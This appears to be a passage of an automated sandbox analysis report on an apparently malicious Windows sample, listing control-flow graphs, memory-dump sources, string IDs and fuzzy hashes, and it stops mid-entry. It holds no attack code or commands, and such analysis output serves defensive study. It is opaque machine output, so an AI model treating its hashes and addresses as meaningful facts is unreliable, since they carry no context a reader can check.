                                control_flow_graph 333 7ffd9b8906fa-7ffd9b890737 335 7ffd9b890739-7ffd9b89079c 333->335 342 7ffd9b89079e-7ffd9b8908a1 335->342 361 7ffd9b8908a8-7ffd9b8908e7 342->361 362 7ffd9b8908a3 342->362 364 7ffd9b8908e9 361->364 365 7ffd9b8908ee-7ffd9b890905 call 7ffd9b8904f8 361->365 362->361 364->365 368 7ffd9b89090a-7ffd9b89091e 365->368
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^U$N_^X$N_^f$N_^g
                                • API String ID: 0-893460077
                                • Opcode ID: cf64c7bcd9214fff3596255617e1e550510df3047d99dd3259ccf672651b8300
                                • Instruction ID: d2383a082946d2180063f89b5f46dcd41c70e4251027c3e641782c5c1701a041
                                • Opcode Fuzzy Hash: cf64c7bcd9214fff3596255617e1e550510df3047d99dd3259ccf672651b8300
                                • Instruction Fuzzy Hash: 2861AE63B0F6895FEB2297DC5CA41E87FA1FF45760B4501F7D158C70A7EC15A9068381

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 370 7ffd9b8906e0-7ffd9b890737 374 7ffd9b890739-7ffd9b89079c 370->374 381 7ffd9b89079e-7ffd9b8908a1 374->381 400 7ffd9b8908a8-7ffd9b8908e7 381->400 401 7ffd9b8908a3 381->401 403 7ffd9b8908e9 400->403 404 7ffd9b8908ee-7ffd9b8908f5 400->404 401->400 403->404 405 7ffd9b8908f7-7ffd9b890905 call 7ffd9b8904f8 404->405 407 7ffd9b89090a-7ffd9b89091e 405->407
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^X$N_^f$N_^g
                                • API String ID: 0-3255808656
                                • Opcode ID: 8d33b814f53705e09db852fce5cc4fd278a22c1d0eeea874b51107369f75eda4
                                • Instruction ID: 233e3e18bc10007e0d091b7a4983d7001fb6866aa5c53b93e3982e6826bb8a5d
                                • Opcode Fuzzy Hash: 8d33b814f53705e09db852fce5cc4fd278a22c1d0eeea874b51107369f75eda4
                                • Instruction Fuzzy Hash: BE61BD63B0F6895BEB2697DC6CA50E87FA0FF49760B4502F7E058C70E7EC156A068381

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 409 7ffd9b8906a5-7ffd9b890737 413 7ffd9b890739-7ffd9b89079c 409->413 420 7ffd9b89079e-7ffd9b8908a1 413->420 439 7ffd9b8908a8-7ffd9b8908e7 420->439 440 7ffd9b8908a3 420->440 442 7ffd9b8908e9 439->442 443 7ffd9b8908ee-7ffd9b8908f5 439->443 440->439 442->443 444 7ffd9b8908f7-7ffd9b890905 call 7ffd9b8904f8 443->444 446 7ffd9b89090a-7ffd9b89091e 444->446
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_I$N_^J$N_^K$N_^f$N_^g
                                • API String ID: 0-3465608391
                                • Opcode ID: e4245ea89de9462f7d7b8548654718cbe0b8649343b3503ccc45a70aeb1404f6
                                • Instruction ID: cb180cc5befb068c38ca5d01e4fa4b35395c34986a052c361516aa2ea5aacae9
                                • Opcode Fuzzy Hash: e4245ea89de9462f7d7b8548654718cbe0b8649343b3503ccc45a70aeb1404f6
                                • Instruction Fuzzy Hash: 4A61CB63B0F6895BEB2197EC6CA40E87FA1FF45760B1505FBD198C70E7E815A90683C1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 948 7ffd9b8b687e-7ffd9b8b6887 949 7ffd9b8b6889-7ffd9b8b68a0 948->949 950 7ffd9b8b68d1-7ffd9b8b68e5 948->950 951 7ffd9b8b68bc-7ffd9b8b68c4 949->951 952 7ffd9b8b68a2-7ffd9b8b68bb 949->952 953 7ffd9b8b68e7 950->953 954 7ffd9b8b68e8-7ffd9b8b68f5 950->954 952->951 953->954 956 7ffd9b8b68f7 954->956 957 7ffd9b8b68f8-7ffd9b8b6905 954->957 956->957 958 7ffd9b8b6907 957->958 959 7ffd9b8b6908-7ffd9b8b6915 957->959 958->959 960 7ffd9b8b6917 959->960 961 7ffd9b8b6918-7ffd9b8b6925 959->961 960->961 962 7ffd9b8b6927 961->962 963 7ffd9b8b6928-7ffd9b8b6985 961->963 962->963 966 7ffd9b8b698d-7ffd9b8b69c2 CopyIcon 963->966 967 7ffd9b8b69ca-7ffd9b8b69e6 966->967 968 7ffd9b8b69c4 966->968 968->967
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6f1a5d177dc19cdceca233025e604040af2587def426c4c52ef9031d079652d
                                • Instruction ID: 48bf3291a8e1f8b13e97a15aaa8d93316807d1f7dd436d05575df4911547e277
                                • Opcode Fuzzy Hash: e6f1a5d177dc19cdceca233025e604040af2587def426c4c52ef9031d079652d
                                • Instruction Fuzzy Hash: 6D518C7198D69C4FD71ADB749C166E9BBF0EF46320F0901ABD04CC70A2C629A547CBD1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 969 7ffd9b8b68c9-7ffd9b8b68e5 971 7ffd9b8b68e7 969->971 972 7ffd9b8b68e8-7ffd9b8b68f5 969->972 971->972 973 7ffd9b8b68f7 972->973 974 7ffd9b8b68f8-7ffd9b8b6905 972->974 973->974 975 7ffd9b8b6907 974->975 976 7ffd9b8b6908-7ffd9b8b6915 974->976 975->976 977 7ffd9b8b6917 976->977 978 7ffd9b8b6918-7ffd9b8b6925 976->978 977->978 979 7ffd9b8b6927 978->979 980 7ffd9b8b6928-7ffd9b8b69c2 CopyIcon 978->980 979->980 984 7ffd9b8b69ca-7ffd9b8b69e6 980->984 985 7ffd9b8b69c4 980->985 985->984
                                APIs
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID: CopyIcon
                                • String ID:
                                • API String ID: 2764894445-0
                                • Opcode ID: 07a4b8826170a0c94895dbcec41a427428588e67dbddc77e9af75799554d87e9
                                • Instruction ID: e556e943bee73fbb72e8c9daaf7bf2e6eb5eb0d97118da5056d02b7d87ac88f5
                                • Opcode Fuzzy Hash: 07a4b8826170a0c94895dbcec41a427428588e67dbddc77e9af75799554d87e9
                                • Instruction Fuzzy Hash: E641777198D6984FD70ACBB49C166E97FB0EF46320F0902ABD048C70A3C629A547CBD1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1141 7ffd9b8904f8-7ffd9b891279 1148 7ffd9b89127b 1141->1148 1149 7ffd9b891280-7ffd9b89128f call 7ffd9b8905d8 1141->1149 1148->1149 1151 7ffd9b891294-7ffd9b89129b 1149->1151
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_^
                                • API String ID: 0-1123592777
                                • Opcode ID: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction ID: f81a0918c252fd9d7bca808ca4fb4401466ed33aac772872a09b32639ecbfd15
                                • Opcode Fuzzy Hash: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction Fuzzy Hash: 7401D231A0D25E9FDB56EFA898A15F67BA0EF05308F0401BAE05CC6093EA68A551C781
                                • Instruction Fuzzy Hash: 42319231E1E61E9AEB74BB9084217F8B6A1FF4A700F410279D05EA21E1CF396A45DA80
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 97c377cee9ab3d2218d014e7cad0c12cb97e4e24944262f6a18b6d5de5a99ce2
                                • Instruction ID: cad8b9d3cb2335a74bedb24762684cfcc55497077f3ccc3bf976f8bcd6176f4e
                                • Opcode Fuzzy Hash: 97c377cee9ab3d2218d014e7cad0c12cb97e4e24944262f6a18b6d5de5a99ce2
                                • Instruction Fuzzy Hash: 6C31CD30A0E68D8FDB56DFA4C8216ED7FB0FF0A300F0500BAE018D31E2DA28A904C791
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d8822d01a3815d495fb559213be03e1887d2fbdd0b3d7d787afbcb295f0938ef
                                • Instruction ID: 032c5d873927242fe9a0eb29dc1a4d324b67ff93d28ba3184c86055781d86448
                                • Opcode Fuzzy Hash: d8822d01a3815d495fb559213be03e1887d2fbdd0b3d7d787afbcb295f0938ef
                                • Instruction Fuzzy Hash: 07218E32F1E94E5BEB74F7A898506E97BD0FF49310F01067BD458C71A1ED29AA0A4381
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e29609350557b83bb091fcc61096ebbc12fe9a225958e45850b465a84d286dd4
                                • Instruction ID: a03e3639dd7c2a661c13f8aa1fc684928093e4ecb4ee1a4ce2e7d1c0502ce80c
                                • Opcode Fuzzy Hash: e29609350557b83bb091fcc61096ebbc12fe9a225958e45850b465a84d286dd4
                                • Instruction Fuzzy Hash: 0A11A211A4F6CA6AEF6267B948350617F905F07324B1F42FFD0E9CA0E3D80D9A46C302
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c594419448d77d2e6fa2f0cbbe90e10d4211e664021ea72d9016564636c4e1ec
                                • Instruction ID: 201142a963bca05ea51de3385856b3845a7fed9c16303baf250cda533b73dd6c
                                • Opcode Fuzzy Hash: c594419448d77d2e6fa2f0cbbe90e10d4211e664021ea72d9016564636c4e1ec
                                • Instruction Fuzzy Hash: 9311233190D78C8FCB66EF6488651E53FA0FF1A300F4501EAD418CB192DB7AEA1AC741
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c17de91ca9b8be5cdb870773bec5cce0768cac71f679ca07555ecfd44bdc8c6
                                • Instruction ID: 562591556a54ec7001ce8ba259cf442e61daf040747a8a2d11776369b527ace2
                                • Opcode Fuzzy Hash: 1c17de91ca9b8be5cdb870773bec5cce0768cac71f679ca07555ecfd44bdc8c6
                                • Instruction Fuzzy Hash: 93110D31E1A52D8EDB68EB60D4617FCB671FF06701F8114B9D04EA6192CE356A44DB40
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd37913807a62231d0a50f2c883dacd618264727f336762bb7f6a516994c0a61
                                • Instruction ID: 21390fe046c7a92f1efca58e6b3ea05bf3559bc26ab633416f1e372b2a52869a
                                • Opcode Fuzzy Hash: bd37913807a62231d0a50f2c883dacd618264727f336762bb7f6a516994c0a61
                                • Instruction Fuzzy Hash: F3112332F1590E8ECF68EB94D8247EDB761FF49300F80027AD019EB1A5CD3469418B80
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8e267296c9e6a976d963006d9e951a6ed4ef50fb6d847b1bf05fc0b0241325c
                                • Instruction ID: c73a1cfb75593f64e3e0008c71f261493adb5a5bc827a0156a1bef8181961530
                                • Opcode Fuzzy Hash: b8e267296c9e6a976d963006d9e951a6ed4ef50fb6d847b1bf05fc0b0241325c
                                • Instruction Fuzzy Hash: 84F05E3050960E8FDB55EF9494116E577A0FF59304F000176E41CD2195CA35A660C781
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59a9914c19081af18f6e17bd9b88d61c90fd6ed5e0ee4e53f7e7a4022e5e38bd
                                • Instruction ID: 1fbf5e0a813947b4a207871fff0c4a3addbd5fdfdb5687e75b8a4906d036d6f1
                                • Opcode Fuzzy Hash: 59a9914c19081af18f6e17bd9b88d61c90fd6ed5e0ee4e53f7e7a4022e5e38bd
                                • Instruction Fuzzy Hash: EDF0A271A1495E4FDFA8DF68C895BA9B7B1FB58340F1086E6900DE3255DA30AEC58F80
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9cda230a2e41a553f0abc2a51ea3e5543d37ef455c4013804255ba58d143200
                                • Instruction ID: f87e49e2fe8e04818b9505d99d6a7fd6a00d1fc00b7c418bb8a27aad0af4c175
                                • Opcode Fuzzy Hash: f9cda230a2e41a553f0abc2a51ea3e5543d37ef455c4013804255ba58d143200
                                • Instruction Fuzzy Hash: 9BE0ED20F1F40E5AEE74B79D84A567465D1AB48314FBB8275E02EC62F1E928EE82C301
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: f30041032725aa9d0cdc4c1f37f2548c3d31e79fd394116e7dc55691a201d6d8
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: 57E04F3050960ECFDFA4FF58C4506A67BA1FF58344F100539E41CD2190CB35E6A0CB80
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d54fee8a73e13821c860aa1c036d4827bada412924710203874ce08e4fd0af4
                                • Instruction ID: ae7987038be6452c4d89019ed4ba17fe76c0a31e929db86d8fcf7711e1f1b52c
                                • Opcode Fuzzy Hash: 6d54fee8a73e13821c860aa1c036d4827bada412924710203874ce08e4fd0af4
                                • Instruction Fuzzy Hash: C3D0EC31B0551D4ECB54EA8CE8107EDB771EB85311F8001B6C10CE3155DA3059418B81
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: 07c5ada3a90ad1a20dc4ffc236ccd860747a57416fdd8d7692e084031a3b8bdb
                                • Instruction ID: 7f827049a7f83d0ebf9ac8ff72557329257881bd9df5319434d5bdde17f64eb1
                                • Opcode Fuzzy Hash: 07c5ada3a90ad1a20dc4ffc236ccd860747a57416fdd8d7692e084031a3b8bdb
                                • Instruction Fuzzy Hash: 1042F670E1966D8FDBA8DF68C8A0BE9B7B1FF58301F5040A9D05DA7295DB385A81CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: 82a8ce2c4a9265e92cb50faed2b5bb05d69031f2234476f7fde010ca58ac3db0
                                • Instruction ID: 7ec486cea8c9015ad1575594b67f266820ca59809d4260d221d20bb37d001a22
                                • Opcode Fuzzy Hash: 82a8ce2c4a9265e92cb50faed2b5bb05d69031f2234476f7fde010ca58ac3db0
                                • Instruction Fuzzy Hash: E8618B63B0FA895FEB21679C7C651E83BA0FF85721B0501F7E06C8B1A7EC2469468381
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction ID: 0d74a80b5b9681a6fc47cf589b6e4c9d15549aca86ca205bc7f5987a41fafd13
                                • Opcode Fuzzy Hash: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction Fuzzy Hash: 4DD14F71E19A5D8FDB5CEB58D8A4BACB7B1FF58300F0441B9E01DE32A6DA346981CB01
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3fd19e88356e0e9c8b7cad74055656fd0b8810599bf904c2e05154c0248342c1
                                • Instruction ID: 96227e0b963d1b6fcf8070ef4d3996892eac3dc21953ec4dcd5c03c47c38453d
                                • Opcode Fuzzy Hash: 3fd19e88356e0e9c8b7cad74055656fd0b8810599bf904c2e05154c0248342c1
                                • Instruction Fuzzy Hash: 31C17D74A0A95D8FEBA5DBA8C491BBCB7B2FF58300F514179C01DD7296CB386982CB40
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction ID: ea4b5eaa335638d88dd602e3a0051662426f968d1270de9ae65784296307a287
                                • Opcode Fuzzy Hash: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction Fuzzy Hash: 60B15271E19A5D8FEB9CDB58D864BA8B7A1FF58300F0401B9E01DD72E6DE346981CB01
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction ID: 5508ef69b63f5e3adaf1975dd8308f1c9f0e47ddbfa512388eaa37b1b539d82e
                                • Opcode Fuzzy Hash: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction Fuzzy Hash: BB81C231B1DE494BDB68EF5888605B977E2FF9C704B15417EE46EC32A2DE34AD028781
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dbc8a80d0388a0b6de27d8eed5816f0112baa5b8a34e13b448daa3bfecd96bdd
                                • Instruction ID: d5f26cff007f2ec272fe9a441fcbb0cc97d89ed95909fd3f3f3c59d1a6499824
                                • Opcode Fuzzy Hash: dbc8a80d0388a0b6de27d8eed5816f0112baa5b8a34e13b448daa3bfecd96bdd
                                • Instruction Fuzzy Hash: 8B719570E1491D8FDB94EFA8D895BECB7B1FF58300F5041BAD41DE3296DA3469818B41
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 07e4d3fe22d4b00dc502df4de51380f59140182dec0a5c4175b224f016db6301
                                • Instruction ID: 36b62f795e99c4b8708a36dc6bce8230f03c29438eeab179a82781cfbe3a6c42
                                • Opcode Fuzzy Hash: 07e4d3fe22d4b00dc502df4de51380f59140182dec0a5c4175b224f016db6301
                                • Instruction Fuzzy Hash: FE51E730A09A8D8FDB95EFA8C464AADBBF1FF59310F0404BAD01DD7296CE34A841C741
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77b825f064190c1283f69d94ed85ae6c07edb1185758589597d86374ce0d830c
                                • Instruction ID: fc9073415e1ff261f05c3fae37f77e90a88a3aac00d82eec7de5b87b3dd8d22e
                                • Opcode Fuzzy Hash: 77b825f064190c1283f69d94ed85ae6c07edb1185758589597d86374ce0d830c
                                • Instruction Fuzzy Hash: C051D761A0FA994FE7A29BA88C657A87BA0EF59300F0540F7D09CC71E7DE346A85C741
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
